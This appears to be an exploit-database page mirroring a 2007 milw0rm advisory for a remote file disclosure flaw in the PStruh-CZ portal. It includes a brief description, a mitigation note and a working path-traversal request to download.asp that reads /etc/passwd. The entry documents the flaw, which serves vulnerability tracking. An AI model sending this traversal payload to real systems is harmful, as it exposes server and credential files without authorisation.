header-logo
Suggest Exploit
vendor:
PStruh-CZ
by:
Dj7xpl
N/A
CVSS
N/A
Remote File Disclosure Vulnerability
CWE
Product Name: PStruh-CZ
Affected Version From: 1.3
Affected Version To: 1.5
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

PStruh-CZ Remote File Disclosure Vulnerability

The PStruh-CZ portal is vulnerable to a remote file disclosure vulnerability. By manipulating the 'File' parameter in the 'download.asp' script, an attacker can disclose sensitive files on the server. In the provided example, an attacker can download the '/etc/passwd' file.

Mitigation:

The vendor should release a patch to address the vulnerability. In the meantime, users should restrict access to the 'download.asp' script or implement proper input validation to prevent file disclosure.
Source

Exploit-DB raw data:

          /*-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-*\
          |*                                                                                                 *|
          |*                                    Y! Underground Group                                         *|
          |*                                                                                                 *|
          \*-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-*/

          /*-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-*\
             Portal.....:   PStruh-CZ 1.3&1.5
             Type.......:   Remote File Disclosure Vulnerability
             Author.....:   Dj7xpl / dj7xpl@2600.ir
             HomePage...:   http://Dj7xpl.2600.ir
          \*-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-*/


          /*-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-*\
             Bug........:

	     download.asp?File=[File Path]&PT=[PostFix]
             download.asp?File=../../../../etc/passwd&pt=zip
          \*-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-*/

# milw0rm.com [2007-05-02]

Navigation

Suggest Exploit

Services By CQR